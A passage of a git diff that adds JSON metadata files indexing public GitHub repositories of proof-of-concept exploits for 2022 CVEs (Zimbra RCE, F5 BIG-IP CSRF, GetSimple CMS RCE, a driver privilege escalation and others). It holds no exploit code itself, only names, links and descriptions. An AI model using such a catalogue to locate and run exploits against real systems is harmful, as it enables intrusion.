"polar0x\/CVE-2022-41333", + "owner": { + "login": "polar0x", + "id": 115294515, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/115294515?v=4", + "html_url": "https:\/\/github.com\/polar0x", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/polar0x\/CVE-2022-41333", + "description": "FortiRecorder Denial of Service Exploit (CVE-2022-41333)", + "fork": false, + "created_at": "2023-03-10T17:29:09Z", + "updated_at": "2023-09-11T16:07:58Z", + "pushed_at": "2023-03-14T15:41:42Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-41343.json b/2022/CVE-2022-41343.json new file mode 100644 index 0000000000..b204c8d2d3 --- /dev/null +++ b/2022/CVE-2022-41343.json @@ -0,0 +1,38 @@ +[ + { + "id": 602302259, + "name": "CVE-2022-41343", + "full_name": "BKreisel\/CVE-2022-41343", + "owner": { + "login": "BKreisel", + "id": 1513073, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1513073?v=4", + "html_url": "https:\/\/github.com\/BKreisel", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/BKreisel\/CVE-2022-41343", + "description": "🐍 Python Exploit for CVE-2022-23935", + "fork": false, + "created_at": "2023-02-15T23:17:55Z", + "updated_at": "2024-01-17T19:11:33Z", + "pushed_at": "2023-02-17T18:37:12Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve", + "cve-2022-41343", + "exploit", + "python" + ], + "visibility": "public", + "forks": 0, + "watchers": 3, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-41352.json b/2022/CVE-2022-41352.json new file mode 100644 index 0000000000..46efdfe8f8 --- /dev/null +++ b/2022/CVE-2022-41352.json @@ -0,0 +1,102 @@ +[ + { + "id": 548959911, + "name": "cve-2022-41352", + "full_name": "segfault-it\/cve-2022-41352", + "owner": { + "login": "segfault-it", + "id": 24494334, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/24494334?v=4", + "html_url": "https:\/\/github.com\/segfault-it", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/segfault-it\/cve-2022-41352", + "description": "cve-2022-41352 poc", + "fork": false, + "created_at": "2022-10-10T13:04:34Z", + "updated_at": "2023-12-05T00:38:46Z", + "pushed_at": "2022-10-10T13:12:33Z", + "stargazers_count": 7, + "watchers_count": 7, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 7, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 564929230, + "name": "cve-2022-41352-zimbra-rce", + "full_name": "Cr4ckC4t\/cve-2022-41352-zimbra-rce", + "owner": { + "login": "Cr4ckC4t", + "id": 63863112, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/63863112?v=4", + "html_url": "https:\/\/github.com\/Cr4ckC4t", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Cr4ckC4t\/cve-2022-41352-zimbra-rce", + "description": "Zimbra <9.0.0.p27 RCE", + "fork": false, + "created_at": "2022-11-11T20:58:08Z", + "updated_at": "2024-08-26T13:16:59Z", + "pushed_at": "2022-11-24T14:59:35Z", + "stargazers_count": 100, + "watchers_count": 100, + "has_discussions": false, + "forks_count": 27, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cpio", + "cve", + "cve-2022-41352", + "python3", + "rce", + "zimbra" + ], + "visibility": "public", + "forks": 27, + "watchers": 100, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 729969528, + "name": "cve-2022-41352-zimbra-rce", + "full_name": "qailanet\/cve-2022-41352-zimbra-rce", + "owner": { + "login": "qailanet", + "id": 128580194, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/128580194?v=4", + "html_url": "https:\/\/github.com\/qailanet", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/qailanet\/cve-2022-41352-zimbra-rce", + "description": null, + "fork": false, + "created_at": "2023-12-10T22:29:21Z", + "updated_at": "2023-12-10T23:02:12Z", + "pushed_at": "2023-12-10T23:02:09Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-41358.json b/2022/CVE-2022-41358.json new file mode 100644 index 0000000000..e5410abd2d --- /dev/null +++ b/2022/CVE-2022-41358.json @@ -0,0 +1,33 @@ +[ + { + "id": 552034284, + "name": "CVE-2022-41358", + "full_name": "thecasual\/CVE-2022-41358", + "owner": { + "login": "thecasual", + "id": 29391916, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/29391916?v=4", + "html_url": "https:\/\/github.com\/thecasual", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/thecasual\/CVE-2022-41358", + "description": null, + "fork": false, + "created_at": "2022-10-15T17:06:00Z", + "updated_at": "2022-10-15T17:06:00Z", + "pushed_at": "2022-10-15T17:31:54Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-41401.json b/2022/CVE-2022-41401.json new file mode 100644 index 0000000000..ee4158788c --- /dev/null +++ b/2022/CVE-2022-41401.json @@ -0,0 +1,33 @@ +[ + { + "id": 673039429, + "name": "CVE-2022-41401", + "full_name": "ixSly\/CVE-2022-41401", + "owner": { + "login": "ixSly", + "id": 32583633, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/32583633?v=4", + "html_url": "https:\/\/github.com\/ixSly", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ixSly\/CVE-2022-41401", + "description": null, + "fork": false, + "created_at": "2023-07-31T18:20:35Z", + "updated_at": "2024-06-11T14:40:32Z", + "pushed_at": "2023-07-31T18:25:52Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-41412.json b/2022/CVE-2022-41412.json new file mode 100644 index 0000000000..66bcd4854a --- /dev/null +++ b/2022/CVE-2022-41412.json @@ -0,0 +1,33 @@ +[ + { + "id": 571851858, + "name": "CVE-2022-41412", + "full_name": "renmizo\/CVE-2022-41412", + "owner": { + "login": "renmizo", + "id": 26782725, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/26782725?v=4", + "html_url": "https:\/\/github.com\/renmizo", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/renmizo\/CVE-2022-41412", + "description": null, + "fork": false, + "created_at": "2022-11-29T02:39:08Z", + "updated_at": "2023-03-24T15:19:25Z", + "pushed_at": "2022-11-29T03:24:56Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-41413.json b/2022/CVE-2022-41413.json new file mode 100644 index 0000000000..c108b63d63 --- /dev/null +++ b/2022/CVE-2022-41413.json @@ -0,0 +1,33 @@ +[ + { + "id": 571852635, + "name": "CVE-2022-41413", + "full_name": "renmizo\/CVE-2022-41413", + "owner": { + "login": "renmizo", + "id": 26782725, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/26782725?v=4", + "html_url": "https:\/\/github.com\/renmizo", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/renmizo\/CVE-2022-41413", + "description": null, + "fork": false, + "created_at": "2022-11-29T02:42:16Z", + "updated_at": "2022-11-29T02:52:58Z", + "pushed_at": "2022-11-29T03:32:45Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-41445.json b/2022/CVE-2022-41445.json new file mode 100644 index 0000000000..6dd00f0118 --- /dev/null +++ b/2022/CVE-2022-41445.json @@ -0,0 +1,33 @@ +[ + { + "id": 561240397, + "name": "CVE-2022-41445", + "full_name": "RashidKhanPathan\/CVE-2022-41445", + "owner": { + "login": "RashidKhanPathan", + "id": 65374016, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/65374016?v=4", + "html_url": "https:\/\/github.com\/RashidKhanPathan", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/RashidKhanPathan\/CVE-2022-41445", + "description": "Cross Site Scripting in Teacher's Record Management System using CodeIgnitor", + "fork": false, + "created_at": "2022-11-03T09:06:39Z", + "updated_at": "2024-12-19T15:23:18Z", + "pushed_at": "2022-11-03T09:08:29Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-41446.json b/2022/CVE-2022-41446.json new file mode 100644 index 0000000000..01fc30a589 --- /dev/null +++ b/2022/CVE-2022-41446.json @@ -0,0 +1,33 @@ +[ + { + "id": 561241704, + "name": "CVE-2022-41446", + "full_name": "RashidKhanPathan\/CVE-2022-41446", + "owner": { + "login": "RashidKhanPathan", + "id": 65374016, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/65374016?v=4", + "html_url": "https:\/\/github.com\/RashidKhanPathan", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/RashidKhanPathan\/CVE-2022-41446", + "description": "Privilege Escalation in Teachers Record Management System using CodeIgnitor", + "fork": false, + "created_at": "2022-11-03T09:10:24Z", + "updated_at": "2024-12-19T15:23:19Z", + "pushed_at": "2022-11-03T09:11:35Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-41544.json b/2022/CVE-2022-41544.json new file mode 100644 index 0000000000..3a277e1a3e --- /dev/null +++ b/2022/CVE-2022-41544.json @@ -0,0 +1,64 @@ +[ + { + "id": 641008000, + "name": "CVE-2022-41544", + "full_name": "yosef0x01\/CVE-2022-41544", + "owner": { + "login": "yosef0x01", + "id": 96077889, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/96077889?v=4", + "html_url": "https:\/\/github.com\/yosef0x01", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/yosef0x01\/CVE-2022-41544", + "description": "Exploit script for CVE-2022-41544 - RCE in get-simple CMS", + "fork": false, + "created_at": "2023-05-15T15:24:55Z", + "updated_at": "2024-01-12T21:29:35Z", + "pushed_at": "2023-05-15T21:19:06Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 836386471, + "name": "CVE-2022-41544", + "full_name": "n3rdh4x0r\/CVE-2022-41544", + "owner": { + "login": "n3rdh4x0r", + "id": 66146701, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/66146701?v=4", + "html_url": "https:\/\/github.com\/n3rdh4x0r", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/n3rdh4x0r\/CVE-2022-41544", + "description": "Exploit script for CVE-2022-41544 in GetSimple CMS, with enhanced error handling and detailed usage instructions.", + "fork": false, + "created_at": "2024-07-31T18:27:53Z", + "updated_at": "2024-11-18T18:58:10Z", + "pushed_at": "2024-11-18T18:58:07Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-41622.json b/2022/CVE-2022-41622.json new file mode 100644 index 0000000000..8036315c2a --- /dev/null +++ b/2022/CVE-2022-41622.json @@ -0,0 +1,33 @@ +[ + { + "id": 521035384, + "name": "refreshing-soap-exploit", + "full_name": "rbowes-r7\/refreshing-soap-exploit", + "owner": { + "login": "rbowes-r7", + "id": 104588115, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/104588115?v=4", + "html_url": "https:\/\/github.com\/rbowes-r7", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/rbowes-r7\/refreshing-soap-exploit", + "description": "A PoC exploit for CVE-2022-41622 - a CSRF in F5 BIG-IP control plane that leads to remote root", + "fork": false, + "created_at": "2022-08-03T21:20:29Z", + "updated_at": "2024-07-26T05:14:47Z", + "pushed_at": "2022-10-20T17:37:43Z", + "stargazers_count": 21, + "watchers_count": 21, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 21, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-41678.json b/2022/CVE-2022-41678.json new file mode 100644 index 0000000000..1a002c6236 --- /dev/null +++ b/2022/CVE-2022-41678.json @@ -0,0 +1,41 @@ +[ + { + "id": 895756163, + "name": "CVE-2022-41678", + "full_name": "mbadanoiu\/CVE-2022-41678", + "owner": { + "login": "mbadanoiu", + "id": 18383407, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/18383407?v=4", + "html_url": "https:\/\/github.com\/mbadanoiu", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mbadanoiu\/CVE-2022-41678", + "description": "CVE-2022-41678: Dangerous MBeans Accessible via Jolokia API in Apache ActiveMQ", + "fork": false, + "created_at": "2024-11-28T20:48:21Z", + "updated_at": "2024-11-28T22:20:40Z", + "pushed_at": "2024-11-28T22:20:37Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "0-day", + "authenticated", + "cve", + "cve-2022-41678", + "cves", + "log4jmx", + "remote-code-execution" + ], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-41717.json b/2022/CVE-2022-41717.json new file mode 100644 index 0000000000..9f1d25e08c --- /dev/null +++ b/2022/CVE-2022-41717.json @@ -0,0 +1,33 @@ +[ + { + "id": 577750614, + "name": "h2conn-exploit", + "full_name": "domdom82\/h2conn-exploit", + "owner": { + "login": "domdom82", + "id": 1755853, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1755853?v=4", + "html_url": "https:\/\/github.com\/domdom82", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/domdom82\/h2conn-exploit", + "description": "Exploit for CVE-2022-41717", + "fork": false, + "created_at": "2022-12-13T12:48:48Z", + "updated_at": "2022-12-13T13:13:00Z", + "pushed_at": "2022-12-22T16:01:15Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-41741.json b/2022/CVE-2022-41741.json new file mode 100644 index 0000000000..7a6ed36c4d --- /dev/null +++ b/2022/CVE-2022-41741.json @@ -0,0 +1,33 @@ +[ + { + "id": 792443354, + "name": "evilMP4", + "full_name": "dumbbutt0\/evilMP4", + "owner": { + "login": "dumbbutt0", + "id": 134574598, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/134574598?v=4", + "html_url": "https:\/\/github.com\/dumbbutt0", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/dumbbutt0\/evilMP4", + "description": "Explore CVE-2022-41741 with the Evil MP4 repository. It offers educational PoCs,and documentation on securing nginx against MP4 file vulnerabilities. For legal, ethical security testing only.", + "fork": false, + "created_at": "2024-04-26T17:18:52Z", + "updated_at": "2024-04-26T19:00:29Z", + "pushed_at": "2024-04-26T19:00:26Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-41828.json b/2022/CVE-2022-41828.json new file mode 100644 index 0000000000..424c61bd22 --- /dev/null +++ b/2022/CVE-2022-41828.json @@ -0,0 +1,33 @@ +[ + { + "id": 576236390, + "name": "CVE-2022-41828", + "full_name": "murataydemir\/CVE-2022-41828", + "owner": { + "login": "murataydemir", + "id": 16391655, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/16391655?v=4", + "html_url": "https:\/\/github.com\/murataydemir", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/murataydemir\/CVE-2022-41828", + "description": "[CVE-2022-41828] Amazon AWS Redshift JDBC Driver Remote Code Execution (RCE)", + "fork": false, + "created_at": "2022-12-09T10:35:33Z", + "updated_at": "2023-10-17T01:42:25Z", + "pushed_at": "2023-06-09T07:56:46Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-41852.json b/2022/CVE-2022-41852.json new file mode 100644 index 0000000000..1ebeeedcc8 --- /dev/null +++ b/2022/CVE-2022-41852.json @@ -0,0 +1,76 @@ +[ + { + "id": 551442405, + "name": "CVE-2022-41852", + "full_name": "Warxim\/CVE-2022-41852", + "owner": { + "login": "Warxim", + "id": 13665987, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/13665987?v=4", + "html_url": "https:\/\/github.com\/Warxim", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Warxim\/CVE-2022-41852", + "description": "CVE-2022-41852 Proof of Concept (unofficial)", + "fork": false, + "created_at": "2022-10-14T12:09:19Z", + "updated_at": "2024-08-12T20:27:47Z", + "pushed_at": "2022-10-20T08:01:38Z", + "stargazers_count": 74, + "watchers_count": 74, + "has_discussions": false, + "forks_count": 16, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve", + "cve-2022-41852", + "hacking", + "jxpath", + "penetration-testing", + "pentesting", + "proof-of-concept", + "rce", + "remote-code-execution", + "security", + "vulnerability" + ], + "visibility": "public", + "forks": 16, + "watchers": 74, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 856170835, + "name": "CVE-2022-41852-Disable", + "full_name": "xpectomas\/CVE-2022-41852-Disable", + "owner": { + "login": "xpectomas", + "id": 103617578, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/103617578?v=4", + "html_url": "https:\/\/github.com\/xpectomas", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/xpectomas\/CVE-2022-41852-Disable", + "description": null, + "fork": false, + "created_at": "2024-09-12T05:43:31Z", + "updated_at": "2024-09-12T05:51:40Z", + "pushed_at": "2024-09-12T05:51:37Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-41853.json b/2022/CVE-2022-41853.json new file mode 100644 index 0000000000..0898254beb --- /dev/null +++ b/2022/CVE-2022-41853.json @@ -0,0 +1,38 @@ +[ + { + "id": 722950810, + "name": "CVE-2022-41853", + "full_name": "mbadanoiu\/CVE-2022-41853", + "owner": { + "login": "mbadanoiu", + "id": 18383407, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/18383407?v=4", + "html_url": "https:\/\/github.com\/mbadanoiu", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mbadanoiu\/CVE-2022-41853", + "description": "Research into CVE-2022-41853: Using static functions to obtian RCE via Java Deserialization & Remote Codebase Attack", + "fork": false, + "created_at": "2023-11-24T10:30:56Z", + "updated_at": "2023-12-08T10:02:05Z", + "pushed_at": "2023-11-24T11:44:35Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2022-41853", + "deserialization", + "remote-code-execution", + "security-research" + ], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-41876.json b/2022/CVE-2022-41876.json new file mode 100644 index 0000000000..1594d27f89 --- /dev/null +++ b/2022/CVE-2022-41876.json @@ -0,0 +1,33 @@ +[ + { + "id": 617083370, + "name": "CVE-2022-41876", + "full_name": "Skileau\/CVE-2022-41876", + "owner": { + "login": "Skileau", + "id": 83423277, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/83423277?v=4", + "html_url": "https:\/\/github.com\/Skileau", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Skileau\/CVE-2022-41876", + "description": "PoC for CVE-2022-41876", + "fork": false, + "created_at": "2023-03-21T17:05:07Z", + "updated_at": "2023-06-06T17:38:25Z", + "pushed_at": "2023-03-24T11:20:21Z", + "stargazers_count": 7, + "watchers_count": 7, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 7, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-41903.json b/2022/CVE-2022-41903.json new file mode 100644 index 0000000000..879fb940ba --- /dev/null +++ b/2022/CVE-2022-41903.json @@ -0,0 +1,33 @@ +[ + { + "id": 593531640, + "name": "git-cveissues", + "full_name": "sondermc\/git-cveissues", + "owner": { + "login": "sondermc", + "id": 9403395, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/9403395?v=4", + "html_url": "https:\/\/github.com\/sondermc", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sondermc\/git-cveissues", + "description": "vulnerabilities, CVE-2022-41903, and CVE-2022-23521, that affect versions 2.39 and older. Git for Windows was also patched to address an additional, Windows-specific issue known as CVE-2022-41953.", + "fork": false, + "created_at": "2023-01-26T08:34:53Z", + "updated_at": "2023-01-26T08:47:29Z", + "pushed_at": "2023-01-31T07:52:33Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-41923.json b/2022/CVE-2022-41923.json new file mode 100644 index 0000000000..7d025f733c --- /dev/null +++ b/2022/CVE-2022-41923.json @@ -0,0 +1,33 @@ +[ + { + "id": 569375358, + "name": "GSSC-CVE-2022-41923", + "full_name": "grails\/GSSC-CVE-2022-41923", + "owner": { + "login": "grails", + "id": 64546, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/64546?v=4", + "html_url": "https:\/\/github.com\/grails", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/grails\/GSSC-CVE-2022-41923", + "description": null, + "fork": false, + "created_at": "2022-11-22T17:24:51Z", + "updated_at": "2024-12-05T02:29:25Z", + "pushed_at": "2022-11-22T18:36:19Z", + "stargazers_count": 7, + "watchers_count": 7, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 7, + "score": 0, + "subscribers_count": 5 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-41924.json b/2022/CVE-2022-41924.json new file mode 100644 index 0000000000..7cf403ab5d --- /dev/null +++ b/2022/CVE-2022-41924.json @@ -0,0 +1,33 @@ +[ + { + "id": 912115404, + "name": "CVE-2022-41924", + "full_name": "oalieno\/CVE-2022-41924", + "owner": { + "login": "oalieno", + "id": 18167730, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/18167730?v=4", + "html_url": "https:\/\/github.com\/oalieno", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/oalieno\/CVE-2022-41924", + "description": null, + "fork": false, + "created_at": "2025-01-04T16:40:35Z", + "updated_at": "2025-01-04T17:29:18Z", + "pushed_at": "2025-01-04T17:29:15Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-41966.json b/2022/CVE-2022-41966.json new file mode 100644 index 0000000000..b5cf8d5c9a --- /dev/null +++ b/2022/CVE-2022-41966.json @@ -0,0 +1,33 @@ +[ + { + "id": 585766378, + "name": "Xstream_cve-2022-41966", + "full_name": "111ddea\/Xstream_cve-2022-41966", + "owner": { + "login": "111ddea", + "id": 41444127, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/41444127?v=4", + "html_url": "https:\/\/github.com\/111ddea", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/111ddea\/Xstream_cve-2022-41966", + "description": null, + "fork": false, + "created_at": "2023-01-06T02:37:07Z", + "updated_at": "2023-01-19T05:36:46Z", + "pushed_at": "2023-01-06T02:42:53Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-42045.json b/2022/CVE-2022-42045.json new file mode 100644 index 0000000000..06c98922db --- /dev/null +++ b/2022/CVE-2022-42045.json @@ -0,0 +1,33 @@ +[ + { + "id": 556330756, + "name": "CVE-2022-42045", + "full_name": "ReCryptLLC\/CVE-2022-42045", + "owner": { + "login": "ReCryptLLC", + "id": 18622842, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/18622842?v=4", + "html_url": "https:\/\/github.com\/ReCryptLLC", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ReCryptLLC\/CVE-2022-42045", + "description": null, + "fork": false, + "created_at": "2022-10-23T15:58:18Z", + "updated_at": "2024-10-23T14:46:06Z", + "pushed_at": "2023-06-10T14:28:43Z", + "stargazers_count": 37, + "watchers_count": 37, + "has_discussions": false, + "forks_count": 14, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 14, + "watchers": 37, + "score": 0, + "subscribers_count": 6 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-42046.json b/2022/CVE-2022-42046.json new file mode 100644 index 0000000000..db9b35ce7c --- /dev/null +++ b/2022/CVE-2022-42046.json @@ -0,0 +1,36 @@ +[ + { + "id": 525878944, + "name": "CVE-2022-42046", + "full_name": "kkent030315\/CVE-2022-42046", + "owner": { + "login": "kkent030315", + "id": 37926134, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/37926134?v=4", + "html_url": "https:\/\/github.com\/kkent030315", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/kkent030315\/CVE-2022-42046", + "description": "CVE-2022-42046 Proof of Concept of wfshbr64.sys local privilege escalation via DKOM", + "fork": false, + "created_at": "2022-08-17T16:45:13Z", + "updated_at": "2024-12-25T04:10:24Z", + "pushed_at": "2022-12-24T10:29:08Z", + "stargazers_count": 163, + "watchers_count": 163, + "has_discussions": true, + "forks_count": 26, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2022-42046", + "cve-2022-48019" + ], + "visibility": "public", + "forks": 26, + "watchers": 163, + "score": 0, + "subscribers_count": 6 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-42094.json b/2022/CVE-2022-42094.json new file mode 100644 index 0000000000..7edb2bd2f2 --- /dev/null +++ b/2022/CVE-2022-42094.json @@ -0,0 +1,33 @@ +[ + { + "id": 542059955, + "name": "CVE-2022-42094", + "full_name": "bypazs\/CVE-2022-42094", + "owner": 